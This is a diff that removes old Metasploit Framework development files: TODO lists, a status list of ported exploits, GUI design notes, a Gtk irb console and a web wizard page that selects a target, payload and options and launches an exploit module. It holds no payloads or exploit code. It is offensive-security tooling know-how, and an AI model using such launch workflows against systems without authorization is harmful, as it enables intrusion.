X - log by default in the LogDir
|
||||
X - msfcli
|
||||
- msfweb
|
||||
X - msfpayload
|
||||
X - msfencode
|
||||
- msfconsole
|
||||
- spawn web-server from within msfconsole (msfweb instance)
|
||||
- irb mode
|
||||
- running 'msf scripts'
|
||||
- testing framework
|
||||
- framework core
|
||||
X - handlers
|
||||
- framework modules
|
||||
- exploits
|
||||
- payloads
|
||||
X - encoders
|
||||
- osx encoders
|
||||
- nops
|
||||
- recon
|
||||
- framework sessions
|
||||
- shell
|
||||
- meterpreter
|
||||
- documentation
|
||||
- rex
|
||||
- framework-core
|
||||
- framework-base
|
||||
- module interfaces
|
||||
|
||||
The following things should be implemented both as protocols and as exploit
|
||||
mixins to encourage code re-use:
|
||||
|
||||
X - ftp
|
||||
- backup agent protocols
|
||||
- CA brightstor
|
||||
X - Arkeia
|
||||
X - mssql
|
||||
- sunrpc
|
||||
- xdr
|
||||
- jbase
|
||||
- oracle
|
||||
|
||||
Things that would be useful to have completed, but not a requirement:
|
||||
|
||||
- rex
|
||||
- exploitation
|
||||
- format string generator
|
||||
- opcodedb client (return addr pooling)
|
||||
- networking
|
||||
- msfd 'comm' support
|
||||
- modules
|
||||
- payloads
|
||||
- implement 'reliable' stagers with a higher rating so that
|
||||
if there is enough room, reliable stagers can be used
|
||||
- recon
|
||||
X - basic range/port scanner
|
||||
X - basic service identifier
|
||||
- basic OS fingerprinting
|
||||
- framework-core
|
||||
- handler sharing
|
||||
- exploits using the same payload/handler can share (ref count)
|
||||
- plugin modules
|
||||
- plugin modules can extend the framework and provide new features
|
||||
X - framework-base
|
||||
X - event correlation
|
||||
X - recon events correlations
|
||||
- user interfaces
|
||||
- msfd
|
||||
- daemon interface, provides command line interaction and proxying
|
||||
- support authentication
|
||||
- support SSL
|
|
@ -1,8 +0,0 @@
|
|||
This file contains the list of exploits ported so far and their status:
|
||||
|
||||
Ported
|
||||
======
|
||||
|
||||
aim_goaway: Needs more testing, but hit on Windows XPSP0
|
||||
ie_objecttype: Slightly unstable, needs more testing, but functioning
|
||||
msrpc_dcom_ms03_026: re-exploitation fails, but otherwise working
|
|
@ -1,16 +0,0 @@
|
|||
Things to *not* do in ruby that will break ruby threads. This list
|
||||
isn't complete, but it's things I've noticed while working on stuff:
|
||||
|
||||
- select with no timeout
|
||||
|
||||
This will make a blocking select call that will block all other
|
||||
threads.
|
||||
|
||||
Use Rex::ThreadSafe::select
|
||||
|
||||
- use sleep
|
||||
|
||||
This will block all threads.
|
||||
|
||||
Use Rex::ThreadSafe::sleep (we've now wrapped the global sleep to
|
||||
call the rex sleep)
|
|
@ -1,14 +0,0 @@
|
|||
DynamicSehRecord
|
||||
- causes an exploit to generate a dynamic seh frame if it's an seh exploit
|
||||
|
||||
global
|
||||
======
|
||||
|
||||
SessionLogging (true/yes/1)
|
||||
- enables logging of sessions
|
||||
|
||||
ConsoleLogging (true/yes/1)
|
||||
- enables logging of the console
|
||||
|
||||
DisableAutoSubscribe (true/yes/1)
|
||||
- Disables the auto-subscription of modules to event provider interfaces.
|
|
@ -1,48 +0,0 @@
|
|||
Metasploit Framework MsfGUI TODO List
|
||||
=====================================
|
||||
|
||||
1 - Modify the signal-connect on the MyExploitTree class
|
||||
On Gtk::TreeView of this class, remove "one shot", just make it "execute", dont ask for RHOST
|
||||
the exploit shouldnt get listed in the One-Shot piece until its completed and running and it
|
||||
should be removed once the exploit finishes.
|
||||
=> DONE
|
||||
|
||||
|
||||
2 - Built the MSFLog with a Gtk::TextView
|
||||
the MSFLog needs to also contain the outpout of the exploits as they run
|
||||
So redirect the output User picks exploit, goes straight to wizard, they click Go
|
||||
exploit is added to the Targets list while its in running state
|
||||
(for background exploits like WMF, this will stay there until you manually kill it)
|
||||
when a new session is created, those are added automatically to the sessions list
|
||||
and the output of the exploits are sent to the MSFLogs window.
|
||||
Add some colours with tags
|
||||
=> DONE
|
||||
|
||||
3 - bind a signal-connect to a running exploit
|
||||
you can right click running exploits and kill them (this is technically a job)
|
||||
(right click from Targets)
|
||||
=> DONE
|
||||
|
||||
4 - session interaction
|
||||
needs a wider console, some little buttons for sending '^C' and stuff
|
||||
(maybe even a toggle for hex-mode)
|
||||
so when youre typing on a command shell and need to send like ^D to close out 'cat'
|
||||
also, sessions needs a right-click meny for 'Close'
|
||||
and some way to detect when a session is dead and remove it from the list
|
||||
ie. you type "exit" on the shell
|
||||
=> Partially done
|
||||
|
||||
5 - Preferences page
|
||||
Ton of stuff like binding all Databases stuff or adding preselected payloads user
|
||||
|
||||
6 - Exploit research
|
||||
I think there's a way to perform this feature :
|
||||
- register all child iters from the parent modules (Standart, Payloads, Encoders, ...) to an array
|
||||
- add a Gtk::Entry beside the TreeView or bind a Gtk::Dialog to a right click _Search
|
||||
- Once, the research return true, jump to the selected iter and perform the usual view
|
||||
=> DONE
|
||||
|
||||
|
||||
7 - the msfconsole
|
||||
A fun feature will be to plug the msfconsole to :
|
||||
the Gtk::NoteBook page or/and a dedicated windows/dialog
|
|
@ -1,86 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
# This is a basic irb interface using the Gtk2 GUI library
|
||||
#
|
||||
|
||||
msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
|
||||
$:.unshift(File.join(File.dirname(msfbase), 'lib'))
|
||||
|
||||
require 'gtk2'
|
||||
require 'irb'
|
||||
require 'rex'
|
||||
|
||||
class Console < Gtk::Window
|
||||
|
||||
require 'rex/io/bidirectional_pipe'
|
||||
|
||||
@@offset = 0
|
||||
|
||||
def initialize
|
||||
super()
|
||||
|
||||
# Layout stuff
|
||||
set_default_size(500, 400)
|
||||
set_border_width(10)
|
||||
|
||||
# Skeleton ;-)
|
||||
vbox = Gtk::VBox.new(false, 5)
|
||||
add(vbox)
|
||||
|
||||
@buffer = Gtk::TextBuffer.new
|
||||
@textview = Gtk::TextView.new(@buffer)
|
||||
scrolled_window = Gtk::ScrolledWindow.new
|
||||
scrolled_window.add(@textview)
|
||||
vbox.pack_start(scrolled_window, true, true, 5)
|
||||
scrolled_window.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)
|
||||
|
||||
signal_connect('destroy') do
|
||||
Gtk.main_quit
|
||||
end
|
||||
|
||||
signal_connect('key_press_event') do |edit, event|
|
||||
if event.keyval == Gdk::Keyval::GDK_Return
|
||||
catch_text
|
||||
end
|
||||
end
|
||||
|
||||
# Create the pipe interface
|
||||
@pipe = Rex::IO::BidirectionalPipe.new
|
||||
|
||||
# Start the session interaction
|
||||
@t_run = Thread.new do
|
||||
IRB.init_config(nil)
|
||||
IRB.conf[:USE_READLINE] = false
|
||||
IRB.init_error
|
||||
irb = IRB::Irb.new(IRB::WorkSpace.new())
|
||||
IRB.conf[:MAIN_CONTEXT] = irb.context
|
||||
irb.eval_input
|
||||
end
|
||||
|
||||
# Create a subscriber with a callback for the UI
|
||||
@sid = @pipe.create_subscriber_proc() do |data|
|
||||
@buffer.insert(@buffer.end_iter, Rex::Text.to_utf8(data))
|
||||
@buffer.move_mark('end_mark', @buffer.end_iter)
|
||||
@textview.scroll_mark_onscreen(@buffer.get_mark('end_mark'))
|
||||
end
|
||||
|
||||
show_all
|
||||
end
|
||||
|
||||
def put_text(text = nil)
|
||||
puts text if text
|
||||
end
|
||||
|
||||
def catch_text
|
||||
start = @buffer.get_iter_at_offset(@@offset)
|
||||
puts @buffer.get_text(nil, @buffer.end_iter)
|
||||
@buffer.insert(@buffer.end_iter,"\n")
|
||||
if (not @buffer.get_mark('end_mark'))
|
||||
@buffer.create_mark('end_mark', @buffer.end_iter, false)
|
||||
end
|
||||
@@offset = @buffer.end_iter.offset
|
||||
end
|
||||
end
|
||||
|
||||
Console.new
|
||||
Gtk.main
|
|
@ -1,6 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
require 'gtk2'
|
||||
|
||||
puts "Gtk+ v#{Gtk::MAJOR_VERSION}.#{Gtk::MINOR_VERSION}.#{Gtk::MICRO_VERSION}"
|
||||
puts "Ruby/GTK2 v#{Gtk::BINDING_VERSION.join(".")}"
|
122
dev/msfwx.txt
|
@ -1,122 +0,0 @@
|
|||
Metasploit Framework Wx GUI Design Document
|
||||
============================================
|
||||
|
||||
Code Layout
|
||||
===========
|
||||
|
||||
The 'msfwx' executable must be a wrapper around a Msf::UI class. The
|
||||
current code uses Msf::Ui::Wx::Driver as the backend.
|
||||
|
||||
The Driver must implement a constructor (initialize) that creates a
|
||||
framework instance and intializes the UI code.
|
||||
|
||||
The Driver must implement a method called 'run' which actually starts
|
||||
the GUI.
|
||||
|
||||
The actual GUI code should be stored in the lib/msf/ui/wx directory.
|
||||
|
||||
The Driver is responsible for loading any dependent UI code.
|
||||
|
||||
Wx uses the concept of an 'App' which has one or more 'Frames'.
|
||||
|
||||
The App should create the main Frame and configure the Menus.
|
||||
|
||||
The Frame should create all UI widgets, some of which can be
|
||||
defined and loaded from other files.
|
||||
|
||||
The event processing code can be placed into frame.rb, or loaded from
|
||||
another file, preferably separated out by functionality. The current
|
||||
code does a rather poor job of separating GUI layout from the actual
|
||||
processing code.
|
||||
|
||||
All constants should be placed into constants.rb in the lib/msf/ui/wx
|
||||
directory.
|
||||
|
||||
These are basic guidelines - if something doesn't make sense, feel free
|
||||
to change it.
|
||||
|
||||
|
||||
GUI Features
|
||||
============
|
||||
|
||||
The Wx GUI should support for the following basic features:
|
||||
|
||||
- List each module type and be able to filter based on search criteria
|
||||
|
||||
- Display information about any selected module, session, or job.
|
||||
|
||||
- Provide a tree view of all current hosts and all information about
|
||||
each detected host. The user should be able to modify and add items
|
||||
to the tree and apply modules to specific hosts and services in the
|
||||
tree view.
|
||||
|
||||
- List each active session (a successful exploitation result) and give
|
||||
the user the ability to interact with that session. I recommend using
|
||||
the current Sessions tab and listing each session in a treeview. When
|
||||
the user selects a session and double clicks, a new window will appear
|
||||
that gives them the ability to interact with the session. When the
|
||||
session interaction window is closed, the session should stay alive.
|
||||
The user should be able to terminate the session by selecting it from
|
||||
the list and hitting Delete or right clicking and using a pop-up menu.
|
||||
|
||||
In msfconsole, the session command is used to manage these.
|
||||
|
||||
|
||||
- List each active 'job'. A job is an exploit or auxiliary module that
|
||||
runs in the background. These modules can continue to produce data
|
||||
and sessions while the user does other things. Examples of passive
|
||||
exploits that create jobs are the browser exploits in:
|
||||
modules/exploits/windows/browser/
|
||||
|
||||
In msfconsole, the job command is used to manage these.
|
||||
|
||||
- Provide a way to configure and execute a selected, non-exploit/auxiliary
|
||||
module:
|
||||
a) Provide the ability to generate shellcode from a Payload
|
||||
b) Provide the ability to encode shellcode with an Encoder
|
||||
c) Provide the ability to generate nop sleds with a Nop
|
||||
|
||||
- Provide a way to configure and execute an exploit or auxiliary module
|
||||
a) Auxiliary modules will update the host information tree
|
||||
b) Exploit 'check' functions will update the host information tree
|
||||
c) Exploits can have their target system manualyl specified or selected
|
||||
from the host information tree. Selecting a host node will fill in
|
||||
the RHOST variable (if its supported) and selecting a service node
|
||||
under a host will fill in the RPORT variable if its supported.
|
||||
|
||||
|
||||
GUI Layout
|
||||
==========
|
||||
|
||||
The GUI is divided into three distinct areas. On the left hand side we have
|
||||
a set of tabs, each of which contains a list of things. This is where exploits,
|
||||
sessions, jobs, payloads, and encoders live. The current msfwx code should
|
||||
give you an idea of what I mean by this.
|
||||
|
||||
|
||||
The bottom section can be used to display information about the currently
|
||||
selected item (Information), the current debug log (output of print_status())
|
||||
from inside modules, results of exploit execution, other standard 'console'
|
||||
output, a mini-msfconsole that allows a subset of the normal commands to be used
|
||||
and provides shortcuts for manipulating GUI elements (remove all sessions,
|
||||
stop all jobs, run this exploit on all hosts, etc),
|
||||
|
||||
|
||||
The right panel of the interface will contain the list of hosts in a tree view,
|
||||
each host will also have a list of services, information entries, and other
|
||||
data collected and reported by the other modules.
|
||||
|
||||
When a module is selected, a screen needs to be provided to configure the module
|
||||
and start the execution. I have three ideas on this so far:
|
||||
|
||||
1) Make the right side consist of two tabs - one which has the host information
|
||||
and another which is used to show module exploits and launch the actual module.
|
||||
The thing that sucks about this is that if you want to see the host list while
|
||||
you configure the module, you have to switch between the two tabs.
|
||||
|
||||
2) Make the module configuration a new dialog window that pops up. This is
|
||||
the easier way and may end up being the cleanest way to implement this.
|
||||
|
||||
3) Move the list of hosts into the left-side tabs and then use the entire right
|
||||
side to configure and launch the selected module.
|
||||
|
|
@ -1,311 +0,0 @@
|
|||
<%= Msf::Ui::Web::Common.header(framework.version, 'exploits') %>
|
||||
<tr><td colspan='5'>
|
||||
|
||||
<%
|
||||
name = query_string['name']
|
||||
step = query_string['step'] || 0
|
||||
target = query_string['target']
|
||||
|
||||
step = step.to_i
|
||||
|
||||
if (name == nil)
|
||||
%>
|
||||
|
||||
<%# Display the exploit list if one hasn't been selected %>
|
||||
<br/>
|
||||
<div align='center' class='navHead'>
|
||||
<table class='moduleList' width='100%' cellspacing='0' border='0'>
|
||||
<% framework.exploits.each_module { |name, mod|
|
||||
modinst = mod.new
|
||||
%>
|
||||
<tr>
|
||||
<td class='moduleIcons' align='center'>
|
||||
<%= Msf::Ui::Web::Common.module_icons(modinst) %>
|
||||
</td>
|
||||
<td class='moduleName'>
|
||||
<a href="exploits.rhtml?name=<%= name %>"><%= modinst.name %></a>
|
||||
</td>
|
||||
<td class='moduleSpacer' colspan='2'>
|
||||
</td>
|
||||
</tr>
|
||||
<% } %>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<%# Wizard step 0 - target selection %>
|
||||
<%
|
||||
elsif (step == 0)
|
||||
modinst = framework.exploits.create(name)
|
||||
%>
|
||||
<br/>
|
||||
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
|
||||
<tr>
|
||||
<td class='moduleName'>
|
||||
<div class='textBold'><%= html_escape(modinst.name) %></div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
|
||||
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold'>Name:</td>
|
||||
<td class='textNormal'><%= html_escape(modinst.name) %></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold'>Authors:</td>
|
||||
<td class='textNormal'><%= html_escape(modinst.author.join("<br/>")) %></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold' valign='top'>Description:</td>
|
||||
<td colspan='2' class='textNormal' valign='top'>
|
||||
<%= html_escape(modinst.description) %>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold' valign='top'>References:</td>
|
||||
<td colspan='2' class='textNormal' valign='top'>
|
||||
<% modinst.references.each { |ref| %>
|
||||
<% if (ref.kind_of?(Msf::Module::SiteReference)) %>
|
||||
- <a href='<%= ref.site %>' target='_blank'><%= ref.to_s %></a><br/>
|
||||
<% else %>
|
||||
- <%= ref.to_s %><br/>
|
||||
<% end %>
|
||||
<% } %>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold'>Targets:</td>
|
||||
<td class='textNormal'> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td>
|
||||
<table align='align' cellpadding='2' cellspacing='0' border='0'>
|
||||
<tr>
|
||||
<td class='textBold'>Target Name</td>
|
||||
<td class='textBold'>Platform</td>
|
||||
</tr>
|
||||
<% modinst.targets.each_with_index { |tgt, idx| %>
|
||||
<tr>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
|
||||
<%= idx %> - <a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= idx %>'><%= tgt.name %></a>
|
||||
</td>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
|
||||
<%= Msf::Ui::Web::Common.target_icons(tgt) %>
|
||||
</td>
|
||||
</tr>
|
||||
<% } %>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<%# Wizard step 1 - payload selection %>
|
||||
<%
|
||||
elsif (step == 1)
|
||||
modinst = framework.exploits.create(name)
|
||||
modinst.datastore['TARGET'] = query_string['target'].to_i
|
||||
%>
|
||||
<br/>
|
||||
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
|
||||
<tr>
|
||||
<td class='moduleName'>
|
||||
<div class='textBold'><%= html_escape(modinst.name) %></div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
|
||||
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
|
||||
<tr>
|
||||
<td align='left' width='80' class='textBold'><nobr>Select Payload:</nobr></td>
|
||||
<td> </td>
|
||||
<td> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td class='textBold'>Name</td>
|
||||
<td class='textBold'>Description</td>
|
||||
</tr>
|
||||
|
||||
<% idx = 0
|
||||
modinst.compatible_payloads.each { |pname, pmod|
|
||||
pmodinst = pmod.new
|
||||
%>
|
||||
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
|
||||
<a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= target %>&payload=<%= pname %>'><%= html_escape(pname) %></a>
|
||||
</td>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'><%= html_escape(pmodinst.description) %></td>
|
||||
</tr>
|
||||
|
||||
<% idx += 1
|
||||
}
|
||||
%>
|
||||
|
||||
</table>
|
||||
|
||||
<%# Wizard step 2 - option selection %>
|
||||
<% elsif (step == 2)
|
||||
payload = query_string['payload']
|
||||
modinst = framework.exploits.create(name)
|
||||
pinst = framework.payloads.create(payload)
|
||||
modinst.datastore['TARGET'] = query_string['target'].to_i
|
||||
%>
|
||||
<br/>
|
||||
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
|
||||
<tr>
|
||||
<td class='moduleName'>
|
||||
<div class='textBold'><%= html_escape(modinst.name) %></div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
|
||||
<form method='GET'>
|
||||
<input type='hidden' name='eid' value="<%= Msf::Ui::Web::Driver::next_eid %>"/>
|
||||
<input type='hidden' name='name' value="<%= html_escape(name) %>"/>
|
||||
<input type='hidden' name='step' value="<%= step + 1 %>"/>
|
||||
<input type='hidden' name='target' value="<%= html_escape(modinst.datastore['TARGET']) %>"/>
|
||||
<input type='hidden' name='payload' value="<%= html_escape(payload) %>"/>
|
||||
|
||||
<table align='center' cellpadding='2' border='0' cellspacing='0' width='95%'>
|
||||
<%
|
||||
options = pinst.options.merge_sort(modinst.options)
|
||||
|
||||
options.each { |name, option|
|
||||
next if (option.advanced?)
|
||||
next if (option.evasion?)
|
||||
%>
|
||||
<tr>
|
||||
<td class='textBold'><%= name %></td>
|
||||
<td class='textBold'><%= (option.required?) ? "Required" : "Optional" %></td>
|
||||
<td class='textNormal'><%= option.type %></td>
|
||||
<td class='textNormal'>
|
||||
<input type='text' name="opt_<%= html_escape(name) %>" value="<%= html_escape(option.default || '') %>"/>
|
||||
</td>
|
||||
<td class='textNormal'><%= html_escape(option.desc) %></td>
|
||||
</tr>
|
||||
<% } %>
|
||||
|
||||
<tr><td colspan='5'> </td></tr>
|
||||
|
||||
<tr>
|
||||
<td colspan='3' class='textBold'>
|
||||
Preferred Encoder:<br/>
|
||||
<select name='encoder' size='1'>
|
||||
<option value='__default'>Default
|
||||
<% pinst.compatible_encoders.each { |encname, mod| %>
|
||||
<option><%= encname %>
|
||||
<% } %>
|
||||
</select>
|
||||
</td>
|
||||
<td colspan='2' class='textBold'>
|
||||
NOP Generator:<br/>
|
||||
<select name='nop' size='1'>
|
||||
<option value='__default'>Default
|
||||
<% pinst.compatible_nops.each { |nopname, mod| %>
|
||||
<option><%= nopname %>
|
||||
<% } %>
|
||||
</select>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<tr><td colspan='5'> </td></tr>
|
||||
|
||||
<noscript>
|
||||
<input type='hidden' name='nojs' value="1"/>
|
||||
</noscript>
|
||||
|
||||
<tr>
|
||||
<td colspan='3' align='right'>
|
||||
<input type='submit' name='action' value='Check' class='button'/>
|
||||
</td>
|
||||
<td colspan='2' align='left'>
|
||||
<input type='submit' name='action' value='Exploit' class='button'/>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
|
||||
<%# Wizard step 3 - exploitation %>
|
||||
<%
|
||||
elsif (step == 3)
|
||||
|
||||
# Is JS disabled in the client's browser?
|
||||
nojs = query_string['nojs'] == '1' ? true : false
|
||||
|
||||
# Create the exploit instance
|
||||
modinst = framework.exploits.create(name)
|
||||
|
||||
# Set the encoder/nop to nil if it's not valid.
|
||||
query_string['encoder'] = nil if (query_string['encoder'] == '__default')
|
||||
query_string['nop'] = nil if (query_string['nop'] == '__default')
|
||||
|
||||
# Build the options string
|
||||
options = ''
|
||||
|
||||
query_string.each_pair { |k, v|
|
||||
next if v.nil? or v.length == 0
|
||||
|
||||
if k =~ /^opt_(.*)$/
|
||||
options += "#{$1}=#{v} "
|
||||
end
|
||||
}
|
||||
|
||||
# Use buffered output by default
|
||||
output = Rex::Ui::Text::Output::Buffer.new
|
||||
|
||||
# If we support javascript, then we'll use something better
|
||||
if nojs == false
|
||||
# TODO
|
||||
end
|
||||
|
||||
# Whether or not we should run this as a job
|
||||
as_job = modinst.passive? || (nojs == false)
|
||||
|
||||
# Kick off the exploit process
|
||||
error = false
|
||||
|
||||
begin
|
||||
modinst.exploit_simple(
|
||||
'Encoder' => query_string['encoder'],
|
||||
'Nop' => query_string['nop'],
|
||||
'Payload' => query_string['payload'],
|
||||
'Target' => query_string['target'].to_i,
|
||||
'OptionStr' => options,
|
||||
'LocalOutput' => output,
|
||||
'LocalInput' => nil,
|
||||
'RunAsJob' => as_job)
|
||||
rescue
|
||||
display = "<span style='font-weight: bold'><span style='color: red'>Error:</span> " + html_escape($!) + "</span>"
|
||||
error = true
|
||||
end
|
||||
|
||||
# Use the buffered output for display if we didn't fail.
|
||||
if error == false
|
||||
display = html_escape(output.buf).gsub(/\n/, "<br>")
|
||||
|
||||
if as_job
|
||||
display += "<br/><br/><span style='font-weight: bold'>Exploit is now running in the background.</span>"
|
||||
end
|
||||
end
|
||||
%>
|
||||
|
||||
<br/>
|
||||
<span style='font-weight: bold'>
|
||||
Launching exploit <%= modinst.refname %> ...
|
||||
</span>
|
||||
<br/><br/>
|
||||
|
||||
<%= display %>
|
||||
|
||||
<% else %>
|
||||
Unknown step: <%= html_escape(step) %>
|
||||
<% end %>
|
||||
|
||||
</td></tr>
|
||||
<%= Msf::Ui::Web::Common.footer %>
|